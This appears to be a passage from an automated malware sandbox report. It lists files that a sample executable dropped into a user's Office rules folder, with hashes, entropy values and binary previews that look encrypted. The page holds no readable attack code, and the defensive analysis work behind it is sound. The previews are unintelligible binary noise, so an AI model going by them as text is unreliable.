                                                                                                                                      Preview:<?xmlkK...2y..s*P=..s.....(zq..iA....]Z.7.(.7.u>~c.!P.g.&..X.|.mene..4d....5....@}$...b.+....+.L2.D..........f..M)X....M.k..Q.O.d..1.V.~.={.......uk.._.rw.VW"...<?.<.........e.d.7l.V.c..l..i\m...bF".....[.M.n1)6..#..M|MB.....)..(........2.B.c.[.H..&<.....`i..L.F.cO.....T.........3.....#..K.dW....+.X{.9.U.n.n.EZL..1..7...$..U.]o....b..T..s.dR..Ld.!.Kwu......%'....Dx.Bj.$..D_mb.rK....e;.^v.IdS.M.Zf...|e...a..*Zs.hb..W....I.j.hJ.}....Q...J.~..1.".'V.E...]-5.a..Dk.1..i.z&1.9.;.sL..I._M......I..-...Y.'.....(..c.YK.....m*g...._.g.v.thA.b...I.;.y.....B.2..P..Z..1vg.;4.g..W.8.1...49S......n...."........H37N..1..6..oE.=.%.i.".....&1Zkov...nH..cU...............PW...w.. r..[5....\..b3....?......c#I.Nx+..e}.@Z.K...z.Uw......y.....2...:..}..X...]...N."..1.I.n...h;2.C}h....4.....]...M7...q...1.tD.A1...>..e..QB..........#.\:.I....$7...\..`......].V-..>..........*.>.......4W...)xr..S.HG...9. H..,..i.?...m.P;*.........g...,hh..QX.R.H..n.(y+

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703050v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1724
                                                                                                                                      Entropy (8bit):7.899168972256158
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QWHLRi9bD/zx094hn5s72SEz1LJfLTU5EW+jtV+7Np003JWTPcc0PnTKxrbiBGwA:pHLRyry9sfJLNFcNt8PB0rKVbuReD
                                                                                                                                      MD5:5A1007B0AE6E2119FBDF145FE1206D25
                                                                                                                                      SHA1:87E6CA879935A2F33A9AE1220E7C1F75E44C778D
                                                                                                                                      SHA-256:E1D1A4C3F7846A44A513B12DCD86EBA054FFF1478047D64248D7BAE1438B8E60
                                                                                                                                      SHA-512:8361413D12AE73239236CCCFD9D00E9A62551E91CAA520440AE23D0254AE76117E85989AFC17F094392271651EAD356EDD68F6F4E7F00FF8556516275ED00BA3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..g.uQ.ke"BH7./....739....;....vc.B.J4..}.E.6...8...S.!.c?T.....Z.F.S>..y.^(]....U...$.l.i.T...NAkNr.c=N2.n.c2.;......`+.@.....)..P.a....G.#.A.w.....m.v..f......@...z..g..<.M......n.0.M.....S..T...U}..P.pG..U./.a_Vo...`..K......O...*.B]%QR@.i1.....oc.o...*e.[..........M.B@.2.uC.IkM........e...$...Sx.. .l.s.j...p........?mA......4.ZPH8.wv....GzI`9>.u.........iK.G...............:..N...`,....LA.[~.&%q.../.....Hd!.O.....r..w..~....~...|q...y....%l7..r?.3..kF...B*...h.......l.. ..+...R..$...p....S.\.Lb..B......O...\0;2D...X>*^.S..%sd.......ge.>..u....A7...u.]~N8].d.......D.K..;.<.....[..`...<....RI.....l...T]K4...r..&..(........)Z.cF.to..........%..F.-l......a..wo\)...Xn.i6...1J.$Z.?.9..jOu.k0.......v...0s....R.X(.B.=..i.k..&._..e.......t.._..M.).sG...v...!>....Y4.ZE...Y..cD..6....F-D...{..N+k.....W..........t...A.F#..P7.&.oQ.u0[F8x....M#^..1...-$.A..>.X.....p..G.AB....../.....$!.eK.N.G.#r.....z.O.}.G?\._h..<(..+.....??]!....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703051v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1761
                                                                                                                                      Entropy (8bit):7.903243429199226
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:z2ZqjfQt3FNnPpoS3zKqcQHSgwkk8cs7Dyc7KED:Jjm3tt3JcZ58cs7DycT
                                                                                                                                      MD5:FDB73A93B7B43DBDCC0D4FC93707A613
                                                                                                                                      SHA1:9C30BB2DBC6F6F314F533CAE8C4E7DB1F4194449
                                                                                                                                      SHA-256:C294CCB7DB21272D9B06EEF4EC209337EC17D66778B9DBA4C3BF56FEC8B226C2
                                                                                                                                      SHA-512:FBF4C9DA4011BFAC97F5F46A47B52489B02A4E6F832B91AEC823B7E472D96ECCA49A460A46CF8C5E9A0C4FD171E8AD149249D3C570DC7DEFB89C9B5CF5BAD301
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..EY../.D.G.. ...V.."4......MY...{j~.^S..h..'..X`.?.L..C....t.....SN*0...}...b....t.0.....X..:..v..p.h.?.ni...e.~.t.Y.M."....mm.x.....A....s.....#U....=.........:.<.ab.-...8...B.....[.X...(.*...Iq;.(.J'.E...@.....K...\...".`.!...2....Og..&...^r{..D..rs....W.B..F%.....p....|.._..s.K..}....V...m...k(1.9/~......j..W.h.%a.v..c..%...u..EI+..../J.Xx.PS.>...p..zk.<..C.4t.y.....'...).F.|o..l@.....vj....H]M......t|\./.4TA...v.U._I.o.Y'.....x$.%.M~Y...M.#zZ.,m.IGT..<.n!..}.~.N.DN.iT..I[..-..8.<....cp..t..m.iRL..lTX7Bv._1.|...".`.QL...v.=..M<.cff0...D.3....'s.0..R.....3...%..f...!...e..'.@GD..kj......J..y-........2..8P....a.]6...+4.##..`...]y$....ia...y.......|......i.%..;..L..8... .0...9.V.....2.N.].....y...Q.....'...'(...%LD...+"0.>....M......[..a..k..@..o..6.{.U\&.\J^.D.>.{..7...Q.....y..~K.Z..].....X..d>S.e....I.4Su~..v.a..s.qj.f{|...#U.3.~v..F?%.`.=~P.y...-..)..._...>..f......_...eq.K'e..X..6.$P..J...f.h..6B...2.d.f...&u...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703100v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1689
                                                                                                                                      Entropy (8bit):7.886364378739316
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ODqtRML/oIGBAow3bFkpt+mQmRRLb4EKD:LQL/o1ahkpt+UVHC
                                                                                                                                      MD5:379679D8FEAB687F5D152A4257D3B8D3
                                                                                                                                      SHA1:EFB5990690A0E2260048A979DDE4D09C135E08B4
                                                                                                                                      SHA-256:FEB1AE8C50F466C84099796054D11C6622C56D0D2648C123C76A46763A7FB218
                                                                                                                                      SHA-512:A783554721A02A1097F821B8BBD5EA6C804DA213261671BA5D46850A17689F1F9C24677DA79ADD40B447FF7D9841025BAA487B0077851D58A0E398DA34912B3B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml!....Z....,..|....i.5......5_~OUQ.._.r..^g....1...7.Xi.m......Ju.....`.G...ty...u(.K..?=.#yS.*...:.0......Qa..!^y......KN..vn..@D.u....W....J.I.v..z..j.&"..<..4....T.......wC..P.....TFq..D...P..j.WW..U............e....K.._..y.(.<.@.0A.(.vc...ST........._ej.....U...fDfJ...6C......pf......-..Tp-....5(%.v.F.bY.8.VZ..n....f..#Y.9.j)l.q#.....w..l...H...@..T.)gB...u.Ig..K.(U..m.ol.^v.`..=..,.....).%...im.....1.`..lP..P."...9O@....9QF.+..J..'.B"A...h..+...^....QO=.M...5..O..x..i#P....gGh.EW+......s..q..9^...G...[m...~....p.......>l.....B...4.*....=.U.N.k&..OC...ZV.7....{.$w.5.]{.. ..fD..{.....H.#f.....H'.............O*M...a`R.....+.j.......Wp8.o.[_..rw..-..u.....{..*..o.1I1^...,......O....e.....e...]./.....>.6....[.]...0.."..w;U..1...5...5G0..-....C#.$}...s.l[f$`.u9......X..q.$...(...1.g..,....<.;.| t.@...{.Y*..,8j.{......Uh.......^I.I...?.....0.n"..(.K.)..V.m8..~G..........;.. ..Wun.A&...g..O....8.*u.hf...,.......c.|F..>.......9-

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703101v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1726
                                                                                                                                      Entropy (8bit):7.872777271430664
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:A79gYQAus3mnx37g2Qhc5rYA+Cyl9Yy9M0MvU38kE/pnACVpD:M+SjnhQNEl6y9FMvf/pAG
                                                                                                                                      MD5:56082CA86930EA0EC44217322E5AB3ED
                                                                                                                                      SHA1:C1A52EBD4EF258C028E1E4F3237AFCB957C50991
                                                                                                                                      SHA-256:9C3A9008BB4A3A414C8E47DECE9AFD7BE21DDF6B8E288D611271EC8AF780EA82
                                                                                                                                      SHA-512:EC799CE3D201100F73392764B0DB40B326BEC530689C7A18B1E1E096C117B6658C57CE3AA54117B2E96B8EE2814395111C97DC2A75ABC61BAE790EA3647D5FB8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml}..F*.....yN....OPX.e... .wtZ}3R.n.y..U..Js.h...kr..c.......OCQ......IP.>....9......!.....Q.ed......6....n...F.9#T_I...#..?g....%b.....Y.......@..G.&/}.J.0.m..../......?.$.....G...$~'.mjI...)..?K.S|Rx.&.%=.9+*Kr..h..(fG.JC..f"........9.ji..}.e.Z....A|..,?6..Sq...Q......G...9l`.W..;2..O.~I1...!Be...3.%x...{W...7.O..L9=.|(i.K..i..k.45[.......]l......=4x>.....N&.9....~..B...+o..*.Q...?..n...{..Cn.Ch..k..X..^.85(|..A..[...=.u6..n......=....Z.;..=o.A..f's.bq.S.9d.q..yW?.....o.....:....C"..~...h...+JB.Z..M..-T ...p.y..!...|@._j%.`.Ng.FB.(..Ts.....4......(..i......x...v.........>.e.;J.(..._..V:.`.(..Y..{?... .kp...@...).E\.]N..-@.x...^Ww.C.-.dkC......^......O&.5\H.P.1..9...I.%I...=$...e\...:...>.3../A&....:N..9..f.W`P.pw.zD.[.i..\ ..................s.....K..W.Q.A.h....s.*'.@...R...T0......0k..9`.Nq.,....}.........#...$./......#=.....F.[x}=.......8bs..o..e.y[.Q..d.dB..-U..@.CD2.GR"...Taj.6.ksP.;eQ.^.a....C..-c..... }E.....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703150v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1707
                                                                                                                                      Entropy (8bit):7.875378082603404
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:z2Gdumpg9IHWH3SsOck5ZWxv9omSBw5BMTURJmi8yD:z9omcIHWXSsOck5ZWxv9ormKDa
                                                                                                                                      MD5:82CD356149C446B38BB8CC54FA977D06
                                                                                                                                      SHA1:E82CA2E74AB5D11E2767C8E0612EFFD6636EB43A
                                                                                                                                      SHA-256:E3E1166419390A7D3865F7A8CA25B17703B0AED5AA3D7AF7876BF8871CC2297A
                                                                                                                                      SHA-512:0C2B621F67FE86F5B330B78BF0E877023F92079654BDE86F40E090FA5F70F90A1E62307D985384292D56BD03033FC96CD0B3703A9DBFD67AD13C21C0716DB5B7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.Y.....h.Q.o.Tz-.4..5..U..j.b$W..~..t.Hv2!...+C...tSb.(....ml^..Y..wr.xZ.n....{..x.1.%.....a.a.......'..........5..,..M#.vij'..{.i..."Q.....H._.............$H.m.6.|.?..`........$..3Uz3.......?aj3.D.JUy)...&.........:%NK.neW..}5..V.a.C.M_G..(..........u........"..Z.-f.E.0.;.@qU6..l.]..=Z(...z.3k.).........D....g4.}.2.um.+.r<xJ..GQ.l..?.^....7Bg.....D..3....x.{...8.jU.....5...+.[D.?.r............H.....9...p.9..6."!..#YH$=NKIh......3....:....g..8Hu;.....C.8.w..36.....B4.(..\....`...c....z.....lt..I....n_.....yn.m..MD...R..G..R....H.p7.V|..>Nc@P.'../2.=..Ovu..t.|....5.........c.m..d) ...M.....(T.A)..0"4k....X.a....b.Mx*.d.x..8U...F.z.u..W...u.!....I....J..H....Z]L... ,..v.....;..av...H.^....`~.'..<U*........)..q....8.....c.....sZ...... ....~Y2..4..Lc..C.@......-..k..<....q9#V.ZA.a..e3...7.k/..c..t.no.......?.4l13R.?+.......&.......H..;.1o..O.J'..Pa>i3,....z9.wZ9.e....4..c..M....5=.X8. z|gJ.7<..L^.2...P...l...|...YZ.+t..q5..._...h3?V:

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703151v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1744
                                                                                                                                      Entropy (8bit):7.899688975896908
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:DRX76+gsAd8syFo5LSusKAMEhqXc+HJhGj0+o4wKrNqTD:137uyOpAKXcahGA+opKw/
                                                                                                                                      MD5:A2C8A9A9F2DB5326B48F42EB327E017F
                                                                                                                                      SHA1:3A83376D2917A682C058E42E35B809354B1AE922
                                                                                                                                      SHA-256:8AFAC1CA171467B6F9AD7D856F1DEF74B6D182154DC3F64FE6D00D6CE2C708BB
                                                                                                                                      SHA-512:AA883AE17F7E04974EBC6DCD37CF8F6FCBDEDDCB7156D0C9A433B3A8D803A093C0E426758AA7B6B5E8C2D2AB427748CF19BE9374E1C3717A5AE664D29FBC9940
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.m.?.. ......O.............G...%.L.o(...._.N.2~.S..T6r.AM?EN:.f...3...$.%'v.....5...j..0.W..R....c...~..m.E.%A.q..Q....=.....zH.......uyf.2..0.....[.@.-.^2...p.Uy.5........_c....y......B.QD.V{...<.^..v.d.VN"?..,....qjy.2k.....qM.....[o...6^.Yb....r...`..S:fZ.#..H./h.!..../|.....P..t...J./..D......4...7.')..b.r}Z.e..M.........>7.x..j{.IqFi.<.-....5...eZ.0..P...+..5...O... .;.....>D..z..>....(..c._._.......G.F.j\R..a..X.S.W&...[.u..,"..0...'...Kw..v...2{B.E...G.....[.>G.E.O.N.G.71D..Z...(s>X.a...<..b].H....W.cG....aH."..-.9.r..*I.......h........5Z....h.R....+.)IX..~...)n$_+..Dl..6...C.[6.X...](..m..Uu\.9.2.jB.0;:.3....*%g.(...,...MV.T......GO~.g.Xie......7...@...El..?.UP.O......%.h.S.0...e.....l.0. _r8.3.x.....<..CDF...-..+...dp..U3k.W..n%N.....6.j..0|[.yg.@rVp.......)DWdrHR.3..@.VB.2=.K...g!..!ld6=..9..`C...>...Y.gr.M{..f..4.R..,.A....*wALj..b....uEq.3.....R.F...G}._K........%.g.(7...7.x.$.Zz.c..4....B...T..r...b....0-m....E..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703200v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1695
                                                                                                                                      Entropy (8bit):7.877875437765977
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:I2YPOqbKr+i5L9Bgdlz9Fw7DTKqp44RlD:INxbKZxgLz4aq7P
                                                                                                                                      MD5:6E674202EB04798F2433449F58FE428F
                                                                                                                                      SHA1:8BC5492E0377956784285EC4D97FF5F58138A6E5
                                                                                                                                      SHA-256:A5F53E7AF4439722942B5C9589FCD8DF6B2758F6531DA14BD29D42A011FFA868
                                                                                                                                      SHA-512:B8805FEFB6DB5FB9642CF7268E7C89839945AE3FAD7DF72B6A7E50AD386A1CC12D1BD870834A941A29AA345ED11F311C18F66F6BBA186F7A1DA4CFD1D970FFCD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...D.r.&.... ....:.b<.}~.|.1.CN|.....-.!..[.E..X-.......V.).BE.....U..~+..am...2.t.........D/....l....WrI......,.y1_...H..r^-./.c.[.R........Q.i]u.....9r.4Y.Q.v>o(.jr....TV&.W.e......].|....[.j.t.%.....t....rv'..U.r....."l..<.y..t.W.......]...`~H....\..$..N%...3...2.......Vx...g.S}D.Kpl.s+..w{.w..]?...._.?+.k.;.......6..1.R...r&..cOK?.k.#....E.m8...E.Z..b.$.#0.^..W\S`.K...........L.;.i.T...$.;...c.b.../m...#o.;;c@.....2|...N......T7.c.eA*a. ......I.....e+\d......R......}.Ee!0M.k.*..Al.G{D......\..'..@Y.)..+.t.|.c.3J...;......G.@.....4*..8.Z.N......-:....ty+./.D..W].D.Kn.....4...O.#.Hi.Cg...B.~...7@O.xO.!cpq.a....|..S.....2j.)`V.+v..........[.v....*#dZ.R...}.G.,.V.k..>B.....e..=}S..OBls.^h,.R6....~.....R..3;..M..;9.OM.p..s-....l7..av..(........)-...s....i...L. .Ts.Y.K..m.......$..S^.].K2..i..B{3.I......|.q...j'...R.&...\F. \N.~........`..U.`&....%.Y30.Z..k|.^....?..t..)...HVtW2|D...o....m.N..\E.2.Q....G.m...gb....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703201v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1732
                                                                                                                                      Entropy (8bit):7.8639533974325975
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Ip5PB5/G3l7QAFU6uo65nmJP8XkCpeoUxnDD:y5PL/Cl7PT68PAZpeoe
                                                                                                                                      MD5:B8517B71A3EBB5CEEB91C5B300CAD7AE
                                                                                                                                      SHA1:9F15E74E5D88C26598CDE2DA7CD1CD17A4903732
                                                                                                                                      SHA-256:B3DD424BEB7F806A66E8C6EF7609462CFE89D8364ABEA104F11044FDAE310D17
                                                                                                                                      SHA-512:31A2863F582C46CC8F754040DFA02E40F565A1986C86984CE800422DAE77B182249FCD6D8F7ECD1F3CC9704C84F77E4C6C082B7F1E21FCDEEE6953DE10E1FAE2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...j)R~..M..5...<(..I..7Y...E.y.P.S....6.NB.O}..7.?...U....!...X......c_..[D.PI.om.....|...dZI.S.E......jG..I.MS.d.3..5..?8A.NlY#...~.... ...}.x.).u.K.5......k}....8......;..Kc....t..}Z...C.4..,....g.q...-....u4...`+.Hl......;..~....*.O...^/m....:..~. -...S..-4qO.I..~....$i..c....TuH......F{$..!z-t.z..g...Z.....|...[#.o.|..Aaw...j+..XA...Ze.c..ji.]Bh..M$E....FmC.....n..w.......d{%+.e.h..p{.....s.V.W.........).X..4R..Tn.V..vX.R.>.}.x~.E....v.....~.h.*..u...... \.k.i.m.@..>..K...4....2...}.p8..F..gf.N...J/{]\..~..Q....3M...2.w&.r.4K.r ...b..II..2...0.+.......Q...1...H...K..Fn..t).Zt+.<...x.._Nl..y.^4n....}..O....KY..)....9....c.;.J..y.bC..^t......J.p.ACo.C..~=.5.rY.y..y#.X...t..C..@..."1`"..3.C..j.h'..k.c^..##.'.s..8.) 23.;.tk.9..(...h]/.....^.[......IU.S\..+c.......#vb.......q..$.....E.F...f(d........D...R...b...o....(.gqc...m......SF........u.*.......M..8..V~...Iq..@9Y..~...r...Q~ej7.+.....O....2.....^..m=....t...;....^1...t.r4.`.O.M

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703250v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1693
                                                                                                                                      Entropy (8bit):7.88331631206384
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:9+A5bYWDm/U3RMvvUs0PucdK5197TRvEcsCTj+D:Z5b13cUsf5b7zsCPG
                                                                                                                                      MD5:94DEAB1FC8AD4E538FF4281411F7AB58
                                                                                                                                      SHA1:3F74923AA7777EDF0D301A8D9158E87617E11A6C
                                                                                                                                      SHA-256:61A2209681A2CDA93995CA26C868F1701CB1DB3CA1BD70C077315569BB8A5B77
                                                                                                                                      SHA-512:D114081332C649D5A73E668562855701B1E53CB2F0310736485F3BF51EECE2500359889873CF97D7D0BE442E9E16FAF5A865BA176A5DE2FB5F30256C89B6D1EA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.F#.=..*|=4....._0.....E.......1..Ax....|.....?r..-k..S..+..F.p.v:.-.......f.wr]'$q.P..]...`.\....z1|:...Ue09=}.t...b.uR8...h......H..m..mT..t.|..#5..U..z....h.QA.}......G^t.=;M6z..B.....'..P.......+P.......p.w......=...Sd.,.}.Vz.....[..C3a..aW.#..V.'.N.t-<K.H.,....-_k..&..1J..t..hkb.....j.M.b>..Nw..k......OI.V z?.>...\......%5...h..m..p.B*.)v.!C.U.G.WMF..)....5...{M..f..\u..@..CV...a0...4L~^Sy...j.e..N.5f.b..^G......q^..Yg-....S;=j.......q@.+...n.E....{..zz..4......v..+.9........_....p. ....X.Z.....\..........a/..d.%@.hL..5....`4.=..^.5K.#.....l."W...&..l...._.....L.H.(...+..i..V....L..|.Qw.gY.Z.8l..]..`.C....|k.s..r.L9...4....E.'....q)A..A.._..FO..{b.....Z.e..s/.....gsN+....}^.m9..%..W_...qJ.e..;...BaAX.....d......W"..:............7..t.W.......->z....0`h.P.A/..1.U.....m.7.F.~.J..DE.....%~....6..x.)....\..%.U>.....ccR..3....X.N....7..j.F.=FT...H?-tA.Q.vr...z.=5.K.~,y..j....^>l..O..-]W.C.A...w|..B....Y..^(.1r..)..c7Ht.i.Ja..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703251v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1730
                                                                                                                                      Entropy (8bit):7.877870287584112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:FQWHryQr9nmvIF7T8OLEALHqoF2srYMBD:FQWHOuCI1VKMp
                                                                                                                                      MD5:B4553FCB5F88FD711F44A875BBFF47CC
                                                                                                                                      SHA1:3356C900A509D5F256D6E1D06BA2C6FC07638C8D
                                                                                                                                      SHA-256:1C8ABD7A0D8A41657722179FACE88D125DE246EAA443FE444D1F2CA9CB256D82
                                                                                                                                      SHA-512:698DF7B286CEDACC0939269372EBDEFA79C093C5F21BAC3434D7BC5D309AD41A4CE5329A794B3C38DE123C9919C69A4A47718EC1F96BE1FA70D32491F079CBAC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.N......g.5....^w......R.L..u....(/..%YB...>..^..O...*.pj...H.`.L...t...I@.C.+.g..*z.nA.......?.X-.Xk...5 ...!Po.,..2..6d.D.5L8..!.../^..n.`.xS.2k.y.9.n...v..f*...tb.C..t&...<.B.($....$../...*.l..G..O..W..fW......Kv) .~.~1,#z.lpi.....^...y]..E..Tc.....o7.kx.[.v..Wy.&U....pOR]..-mF2.G.S1..>.-G.@D.dz.Tu....KzC.p.9..e..K..i_/#7.XO1q..(.x....n.I'.#..s.w)...W..... ....y.Z.R.;...tA..nx..>.>~$.?........<(kg.....5.qm.....N`...s......Zq..A.......o!.N+."..\n.$urn ..$...Nh...>.V.Ju.*r..f.+..2m.\..!......<..z..~!.u.?8.t..f.I.%.......9).....EP...=NH.../yS.k..f...MnH....}].l...Z..a..:y........c'..$#....Cr....2(...K.|4.!.N.s.;=N.=S.9e.?6..D..Pj$aG....`.r1."6.....~.q-b.`w.C...Y.....v}.J....V[.)p.....S.o..u.k9k.J. ..tM...#.(2..........U4..+..qE....Di.h...(s.u....Q.e.d......J.T...k..U<.Y.9...//9.....c..4.i[..9....^..r...Z7:.H..1<.........}..G..&u....f_..4.~'..i;.....U....6........!B.f.6......1-...]>O...Z.....Y.]zI.S...X(.5..........Q......

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703300v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1715
                                                                                                                                      Entropy (8bit):7.870228718752693
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:31C7Jm9qUvNAlZU3AhmmESp+gjtytE2Sp4CvFrnnD:3owIYUkAhETGtT2SzvFrD
                                                                                                                                      MD5:275B3EF990567097C1DEB7E801D6810D
                                                                                                                                      SHA1:EB73E31C912A59FB8C14C72F5B5FAF8DE92386B5
                                                                                                                                      SHA-256:F2461357B16711193A281760C0A212B9D62A8E57145FFC0CD782E415CDD64E45
                                                                                                                                      SHA-512:6F1F9297CACA8D677D0563FC37C47C3DDFF8E4F48A649751D6029AFB285F994C6AFFC2D79E670CB62BCE94BA4AAD319FF92BB33681D4DD92D6FEBD95E7DBF22F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml. .ph..~..._D..Ll&.]../d..z?.].xoK.....)...l.T;M2...F..q.E.,F..;.>..5.W.p..2.%).0.E.......X..........[......v..9.....e.xC..Cv>^.o.l.:'Of....k...../OwO.*......,.:.]...b4..X.q~k....^.0..[...X.d'c[.s..........=.a.l.v`..!.....?..2....x.&..(nF.U3G:......q.G.r.Egt.#M......5!.#.o.J.3...$Stz~.*.Q.=)VP.....bC".NS..&4..KE.....-[h...j.G......Z)/.Z..q...2U.O....=..,}8oqAob....X)..Dj1.jb.Y.a....I..eC.F....v.QrX.b..-..rX.,..Q.........p....%.t1E%..X[........Zc........h...4.....t...Y..8ES./(W.v.m......N.)..7.....u..on....3...............pO..'.}<.Oz9..Q$......m.ew./....e.2...w....=.x.....'e.....R..gc...&...6........~m..jn6U.ef.E.y..n.%$Qt...P.%.2o.N.9S....{5..G...........]Y4......pN3...../.Ho..<P..I1p...##....XY<.....3....t._!..f...M0L...G..|..-gKw..9..._(.p.vz.6.....*.+nY.1...b...~2.....h.C..M..9H.q...~Z..F.o...8.L/Y...).....g.........Z.4.nH.).4.4#..Z.5....4.>/....g.D.W....6kb.y.A...u....W.b..\0.m.I..r.I.......A;............i.......].jv..r.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703301v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1752
                                                                                                                                      Entropy (8bit):7.878748736377144
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:J/90tpxk8e5B4GxVeJZrSjANL1k4JXNIn+D:J8fV4WGifSMNxzJj
                                                                                                                                      MD5:AEFA0C4B47AB53E41D5D7C329F02F2AB
                                                                                                                                      SHA1:A796519489CCD3D9627F039CAAF07497A9542FC5
                                                                                                                                      SHA-256:23148AD5E68A898D5185A92C5E1566A03C2567E87AB8E2C54274553508A6DB96
                                                                                                                                      SHA-512:3BF61969882B8214B85C802F70995DCC1F1581DCC43D565D44A3B560BF2A598CD9970ABBF6908D6A5353FD2E482FC4E74A20BF740F84154F95BF6EE6B5014C93
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlB4..sCB..l.)}0T.we<.h.++Q....r.rJh..m.uZF...b..D...S>.....Sf...4......c....a.W.V*.....O.|..(......PKai#...8m...-......a2.-..xe....#....._.....{......*...+......?.V...J.......g..qp,..3.0....ua.=.J..V.@....fk.6.......&p>8.F....E.&.5P<.{,QD... ..%M...B9.G.Fb.`..y...%5(.....( .Z..:...Gk.........M(.%...)..G.....P......rb...x.......u.>..W_.(..;s.c.....C.G..7...k........|.d...........#p....W.RJ..yj3..t:.5.(7..kb&.l..J..R5.2.QGX..c.U.\.......8....wS]...a..r.".......0*.}.C..{c!.w........0..0....@.r..9|..l..NEQ..\.`..7.0.*..m.!?.....G...k.._.HB.D..).....#..c.%....53......=Frl.....&+HbrT../7.........n.....G...%...Tf(D;..Gp..%-+-f.....%..h......2U.Wz5.9_T,....N.h.l(^. .ir.S.....i.pb......E....2.4.~..T....deb.Bk....K\h#7..P...(.z.'&v..~....D.&7T..Y........J.+:.V..O/.Da..u...y.+.za....[..U..G..N...FQ6.v.)c.O.3..X.>.K...J..+I.8.........p.)...Ead ....* Jbv.....g..dy..*.A.........N......:6U......Own..i.O.;..Z&.AS.~.r..".(....|...gx...{.f.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703350v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1699
                                                                                                                                      Entropy (8bit):7.8709368151140175
                                                                                                                                      Encrypted:false
